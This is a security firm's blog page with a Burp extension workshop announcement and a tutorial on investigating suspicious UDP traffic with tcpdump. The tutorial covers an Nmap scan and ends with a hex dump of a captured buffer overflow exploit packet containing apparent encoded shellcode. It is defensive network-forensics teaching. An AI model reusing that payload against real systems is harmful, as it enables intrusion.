Our Principal Security Consultant Marc Wickenden will be hosting a workshop at the "UK's premier information security conference and training event" - 44Con - next week in London. The two-hour practical workshop "Burp Plugin Development for Java n00bs" will run on either Thursday or Friday in the Technical Workshop Track.

High-level Outline
Burp Suite stands out as the de facto attack proxy for web application assessments. Part of its power lies in the Burp Extender interface, which allows "developers" to extend Burp's functionality, including reading and modifying runtime data and configuration, triggering key actions such as Burp Scanner, or extending the Burp user interface itself with custom menus and windows.

"That's great, but I'm not a developer, I'm a webapp tester and I want the goodness too"

This practical workshop will take you from zero to hero even if you've never coded a line of Java in your life. Through some basic hands-on examples I will guide you through the process of getting your machine ready for coding, the key features of Burp Extender and how to use it to solve some real world web application testing scenarios.

Details
A rough agenda for the workshop is as follows:
  • The problem Burp Extender solves
  • Getting ready
  • Introduction to the Eclipse IDE
  • Burp Extender Hello World!
  • Manipulating runtime data
  • Decoding a custom encoding scheme
  • "Shelling out" to other scripts
  • Limitations of Burp Extender
  • Examples of really cool Burp plugins to fire your imagination
Requirements
Those looking to attend will require:
  • Laptop running Windows 7 (or OSX/Linux, but I won't be demonstrating with or troubleshooting these) with WiFi capability. A VM is fine, if not preferred.
  • Java Runtime Environment 6 or above
  • Burp Suite 1.4 and above (Professional preferred but Free will be ok)
  • Administrator rights to the machine as they will need to install software (supplied on USB stick)
  • Some programming experience with other languages is assumed. My background is in Bash, Perl, PHP, Python and Ruby if that helps you gauge your own capabilities.
Any questions relating to the workshop, requirements and topics can be sent via Twitter (@7Elements) or by email to our usual address contact-us@7elements.co.uk.




Monday, 6 August 2012

Using tcpdump for network analysis

For this post, we are going to look at using tcpdump to investigate potentially malicious traffic and the steps required to complete an investigation. 


This blog post is based on an answer that I provided on the IT Security Stack Exchange site about analysing network traffic for malicious content. If you don't follow Stack Exchange, then you should. It's a fantastic resource.


So back to the blog. For me, there are three key stages required when investigating potentially malicious or rogue traffic:


Stage 1 - Traffic Capture
Stage 2 - Analysis
Stage 3 - Identification


Each can be delivered either through a very formal process or on an ad hoc basis. The end goal of the investigation would drive this requirement. For this scenario we are taking an ad hoc approach that uses tcpdump to investigate UDP traffic.


The section of traffic that we are interested in comprises:

09:06:16.982995 IP 192.168.188.128.63793 > 192.168.188.1.42313: UDP, length 0
09:06:16.986062 IP 192.168.188.128.63793 > 192.168.188.1.623: UDP, length 0
09:06:16.986274 IP 192.168.188.128.63793 > 192.168.188.1.30303: UDP, length 0

10:30:36.313999 IP 192.168.188.128.50056 > 192.168.188.1.26000: UDP, length 2201

So using our three stage approach we will now investigate this further.

Stage 1 - Traffic Capture.
This stage is about using the right tools to capture the traffic.


Tool Choice: 


To do anything sensible is going to require raw packet output, so use your tool of choice (Wireshark and tcpdump are two examples). Personally I would use tcpdump and, if needed, load the traffic capture into Wireshark for a nice graphical view of the world.

Config: 


You will need to configure the tool to capture the entire packet - by default tcpdump only captures 68 bytes of data. 

I would also capture the hexadecimal output by using the -x flag. Doing so will allow me to examine the individual bits (very important when doing a deep dive on evil packets).

For this post we are interested in UDP traffic, so you can limit the packet capture to UDP only traffic. 

This is done by matching the value 17 (the protocol number for UDP) at offset 9 of the IP header; the raw filter expression would be 'ip[9] = 17'. For ease, tcpdump has an inbuilt macro which does this for you: the udp keyword (note that the filter expression goes after tcpdump's options on the command line).


Execute: 

An example command line for tcpdump would be:
tcpdump -s 0 -x -w /udp_traffic udp


This would capture the entire IP frame with hexadecimal output for UDP traffic only and write this to a file called udp_traffic.

Confirm: 

To confirm that this works you can then run:
tcpdump -r /udp_traffic 

This would give you something like:
09:06:16.982995 IP 192.168.188.128.63793 > 192.168.188.1.42313: UDP, length 0
09:06:16.986062 IP 192.168.188.128.63793 > 192.168.188.1.623: UDP, length 0
09:06:16.986274 IP 192.168.188.128.63793 > 192.168.188.1.30303: UDP, length 0
10:30:36.313999 IP 192.168.188.128.50056 > 192.168.188.1.26000: UDP, length 2201

Stage 2 - Analysis.
Two real options here. Use an IDS/IPS solution and replay your traffic to see what alerts this raises, then chase down each alert to understand whether or not it is a false positive. This approach is more scientific and is based on known bad traffic. It would be quicker if the IDS/IPS has already been tuned for the network and the traffic matches known rules.
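If you have scapy available, replaying a saved capture past a sensor is a one-liner. A minimal sketch (the interface name is a placeholder and you will need root; dedicated tools such as tcpreplay do the same job at higher speed):

# Replay the capture written by tcpdump so an IDS/IPS sensor on the
# segment can see it (requires root; scapy assumed to be installed).
from scapy.all import rdpcap, sendp

packets = rdpcap("/udp_traffic")   # the file we captured earlier
sendp(packets, iface="eth0")       # "eth0" is a placeholder interface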

Or you can use a more gut-feel approach, using your knowledge of the network and the services that are running to review the traffic. This is more of an art than a science, but it has advantages.

People's gut feel is something you can't programme a piece of code to replicate and, if you know your network, things will stick out.

Both approaches will result in the breakdown of traffic into the following groups.


Type of traffic:
  • Breakdown by port
  • Breakdown by source
  • Breakdown by destination
This will enable you to deal with large amounts of traffic in more manageable chunks and look for patterns; a short script can do the tallying for you, as sketched below.
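Here is a rough Python sketch that reads the capture back through tcpdump and tallies packets by source address and destination port. The regex is written for the UDP lines shown in this post and is an assumption, not a general parser:

import re
import subprocess
from collections import Counter

# Match lines like:
# 09:06:16.982995 IP 192.168.188.128.63793 > 192.168.188.1.42313: UDP, length 0
LINE = re.compile(r"IP (\S+)\.(\d+) > (\S+)\.(\d+): UDP")

output = subprocess.check_output(["tcpdump", "-nr", "/udp_traffic"],
                                 universal_newlines=True)
by_source, by_dport = Counter(), Counter()
for match in LINE.finditer(output):
    source, sport, dest, dport = match.groups()
    by_source[source] += 1      # packets per source address
    by_dport[dport] += 1        # packets per destination port

print("top sources:", by_source.most_common(5))
print("top destination ports:", by_dport.most_common(5))

A port scan shows up immediately as one source hitting many destination ports.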

In our example from earlier, we can see that the packets are all from 192.168.188.128, source port 63793, heading to 192.168.188.1 on various ports. The first three packets show classic scanning traffic, in this case an Nmap scan for UDP ports:
09:06:16.982995 IP 192.168.188.128.63793 > 192.168.188.1.42313: UDP, length 0
09:06:16.986062 IP 192.168.188.128.63793 > 192.168.188.1.623: UDP, length 0
09:06:16.986274 IP 192.168.188.128.63793 > 192.168.188.1.30303: UDP, length 0


Traffic content:

If we do find traffic that we don't like the look of, then we can take a look at the hexadecimal output to dissect the packet at a much deeper level. If we take
09:42:15.206332 IP 192.168.188.128.63793 > 192.168.188.1.52503: UDP, length 0

and look at the hex output we see:
0x0000:  4500 001c 43d7 0000 2a11 5327 c0a8 bc80
0x0010:  c0a8 bc01 f931 cd17 0008 3fc1          



Points of interest would be the first byte, 0x45: the high nibble shows 4 for IPv4 (the low nibble, 5, is the header length in 32-bit words). Offset nine shows 11 (remember to convert from hex to decimal), so that is protocol 17, or UDP.

Then we have the source address at offset 12 - c0a8 bc80 (192.168.188.128) - and the destination address at offset 16 - c0a8 bc01 (192.168.188.1). This is just a simple example; building on this we can then look deeper into the packet.
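To make the offset arithmetic concrete, here is a small Python sketch that pulls those same fields out of the hex dump above (it assumes nothing beyond the hex already shown):

# The two hex lines from the example above, concatenated.
packet = bytes.fromhex(
    "4500001c43d700002a115327c0a8bc80"
    "c0a8bc01f931cd1700083fc1"
)

version = packet[0] >> 4                       # high nibble of byte 0: 4 (IPv4)
header_len = (packet[0] & 0x0f) * 4            # low nibble * 4: 20 bytes
protocol = packet[9]                           # offset 9: 17 (UDP)
source = ".".join(str(b) for b in packet[12:16])       # 192.168.188.128
destination = ".".join(str(b) for b in packet[16:20])  # 192.168.188.1

print(version, header_len, protocol, source, destination)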

Stage 3 - Identify and review rogue traffic.
When you have identified any specific traffic that is of interest, then it is a combination of research (Google; other search engines are available) and deep packet analysis.

To give a feel, this type of UDP packet would give me concern and warrant further investigation:
10:30:36.313999 IP 192.168.188.128.50056 > 192.168.188.1.26000: UDP, length 2201

This is the last line in our scenario. Why does this jump out? Well, firstly, the length of the packet is very large for a UDP packet. So let's take a closer look.

In hex the packet looks like this:
        0x0000:  4500 05dc 7d9c 2000 4011 dda1 c0a8 bc80
        0x0010:  c0a8 bc01 c388 6590 08a1 0c07 425a 7454
        0x0020:  3349 3665 5747 6742 4642 4177 7071 4156
        0x0030:  6c5a 7271 7975 5579 5546 6375 4b76 6c4f
        0x0040:  5762 3853 4578 6757 3766 5837 744f 7572
        0x0050:  766e 746b 4339 6c74 6f6c 6156 4264 3072
        0x0060:  566c 6739 7355 4a37 3550 3848 7a70 4d6f
        0x0070:  6f4b 6e77 7762 4b47 6c6c 4f63 3846 7372
        0x0080:  7a7a 4879 7763 6330 4c77 3172 7048 5941
        0x0090:  4177 5676 727a 6f52 4b32 566c 5a6b 5242
        0x00a0:  696b 4976 3470 547a 3467 6f74 644b 376c
        0x00b0:  3468 3443 5676 4758 4535 6857 6b41 657a
        0x00c0:  4779 7731 654d 314a 5976 7265 3974 6e41
        0x00d0:  305a 4358 6f5a 517a 4344 6378 5634 476d
        0x00e0:  7147 6979 3653 6a69 4331 486b 734f 7844
        0x00f0:  4175 6467 7858 636f 5550 386c 6332 5a6c
        0x0100:  3237 3067 5552 514b 6345 4836 7073 516f
        0x0110:  7a52 6631 315a 6365 3563 4f76 4275 4c4a
        0x0120:  6f74 5032 5057 704f 6f5a 4d58 4369 7666
        0x0130:  3847 6733 5555 5036 6e7a 4c6b 3856 4573
        0x0140:  6b59 646b 6b62 6733 5036 6c4c 534c 3248
        0x0150:  4156 3037 656b 7433 3148 6578 6968 547a
        0x0160:  436f 5635 5957 7165 6d66 4565 3563 494d
        0x0170:  6570 7947 4174 5559 4c57 5a59 6d63 3671
        0x0180:  4333 4a4e 7269 4778 5968 6b6b 4155 7a39
        0x0190:  6c53 5772 5573 5644 684f 3456 3237 5267
        0x01a0:  634a 326c 4558 6e5a 6b5a 5255 486f 6436
        0x01b0:  6878 4770 5053 4178 426a 6651 6c53 4e70
        0x01c0:  5970 646b 5539 735a 3254 737a 6964 4a46
        0x01d0:  4b4c 504e 7244 7451 7a41 4945 3233 5951
        0x01e0:  586d 4866 7a54 334c 7947 4145 5041 6a65
        0x01f0:  4850 4665 3168 7446 4639 4172 4731 526e
        0x0200:  324d 5151 4641 737a 4f53 4556 7332 5a38
        0x0210:  614d 735a 3978 444b 4565 5054 7459 5663
        0x0220:  7837 3059 3666 3871 754e 3377 7252 3659
        0x0230:  344c 586c 5232 7265 5a6f 416b 785a 6961
        0x0240:  5156 3973 3267 6279 5738 6272 7663 5463
        0x0250:  6b62 4e70 5a64 4763 4772 4262 4551 5254
        0x0260:  4757 4d76 4e51 414a 3868 5063 7267 304c
        0x0270:  4b78 784c 6b49 5563 7443 5a36 526b 745a
        0x0280:  4c4e 4c68 7175 4a54 3064 626e 4562 5157
        0x0290:  3068 4730 6e47 3650 5468 3467 4e72 4a6b
        0x02a0:  5a51 5771 4a38 5747 4453 6e64 3971 4650
        0x02b0:  4263 7358 6e46 5173 3057 5a57 6f65 7168
        0x02c0:  7a67 5859 6e74 4138 7457 3672 646b 344a
        0x02d0:  5958 5363 7231 6c6c 696e 6a38 704b 6146
        0x02e0:  786d 4f5a 6c57 4d50 4232 3459 7130 6a4d
        0x02f0:  5278 7330 3352 336f 6742 5661 3245 7879
        0x0300:  4e43 444b 4d4b 424f 7441 6a37 6e51 6238
        0x0310:  4e78 5053 6f39 5a64 3632 3879 6e54 5042
        0x0320:  7736 5258 4e42 3557 704d 6b48 7974 5050
        0x0330:  4777 4e63 3269 7672 7672 4266 697a 4c67
        0x0340:  4568 554a 4636 614b 6a56 7068 4e33 4a4c
        0x0350:  5067 7254 6a67 674c 3337 6574 5934 6836
        0x0360:  394c 354e 3261 7456 7270 4f69 6531 3452
        0x0370:  7568 6835 5374 756e 5676 6f4f 767a 6d6b
        0x0380:  6679 6846 4743 3861 3543 6538 454e 4c4c
        0x0390:  4745 7630 5247 6675 5333 3070 3576 4b62
        0x03a0:  5932 3562 6a38 4752 337a 4973 5068 3867
        0x03b0:  364a 6159 3444 7149 5372 4b63 5547 6f6e
        0x03c0:  4e36 4845 6e43 6534 4b48 5568 5639 4b47
        0x03d0:  3835 5862 5a32 6962 3157 7431 4344 3442
        0x03e0:  496e 644e 445a 6851 6870 4373 6951 5776
        0x03f0:  4438 5874 6578 4c38 4d4a 694c 3368 536c
        0x0400:  664e 3369 75b7 3f07 102d 47b3 10f8 7b04
        0x0410:  a81c 4873 7672 46b0 b823 f58d 4b13 d477
        0x0420:  6692 2ae2 2c1a d598 7c22 d624 ba3f 40b2
        0x0430:  0537 08e0 0c35 900d b7bf 4f43 85e3 3afc
        0x0440:  9671 28e1 7527 a91d 4e99 9f4a 12d1 f97e
        0x0450:  18fd b13c 3d42 9b79 7e77 7b4f 89e1 7970
        0x0460:  730b f8b5 bab8 1d3f 2584 e340 bea8 03d0
        0x0470:  c0d6 9614 b067 98b7 9942 bb97 4bb4 9bbf
        0x0480:  3bd4 88f5 4e0c 7546 3d7d 7c09 e07a 69f9
        0x0490:  2c90 7149 a92f 0415 911c 7224 9f74 7827
        0x04a0:  38d5 7637 b1b2 8ceb 6693 432d 7f02 e234
        0x04b0:  b68d 48b3 791b fc7f 3c75 35b9 7141 7447
        0x04c0:  7805 7d20 eb0d 9272 4a83 e001 e10a d2fd
        0x04d0:  734f 700d 9b7c 14b5 4390 bad3 c1f9 7630
        0x04e0:  f5be bf2d 31e3 351d 81fd 7b39 fc27 7e37
        0x04f0:  80e2 2c34 b0b1 1567 7a0c 4b98 3da8 4940
        0x0500:  bb92 b33f 0425 b71c 8d97 4741 b4f8 b8b9
        0x0510:  7705 86d6 4eb6 9193 46d4 422f a93c 6696
        0x0520:  d5b2 2499 484a 9f56 5458 3633 3057 5458
        0x0530:  3633 3856 5848 3439 4848 4850 5658 3541
        0x0540:  4151 5150 5658 3559 5959 5950 3559 5959
        0x0550:  4435 4b4b 5941 5054 5458 3633 3854 4444
        0x0560:  4e56 4444 5834 5a34 4136 3338 3631 3831
        0x0570:  3649 4949 4949 4949 4949 4949 515a 5654
        0x0580:  5833 3056 5834 4150 3041 3348 4830 4130
        0x0590:  3041 4241 4142 5441 4151 3241 4232 4242
        0x05a0:  3042 4258 5038 4143 4a4a 494b 4c4a 484c
        0x05b0:  4945 5045 5045 5045 304d 594b 5546 514e
        0x05c0:  3245 344c 4b46 3250 304c 4b46 3244 4c4c
        0x05d0:  4b51 4242 344c 4b43 4251 3844          


If we spend time deconstructing the packet we will see that there is a lot of data being sent in this single UDP packet, to a high port and from a high source port. In fact, this is an example of a buffer overflow exploit being delivered over UDP.

So, as we have seen, just using a simple three-stage approach we were able to understand what was going on in the scenario. There was an initial port scan for UDP services at 9am. This was then followed by a UDP-based buffer overflow attack against 192.168.188.1 at 10:30am.